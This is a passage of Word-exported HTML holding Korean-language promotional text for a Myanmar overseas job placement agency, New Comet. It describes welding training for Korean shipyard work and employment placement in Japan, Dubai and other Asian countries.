Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" xml:lang=\"KO\" lang=\"KO\">&nbsp;</span><span 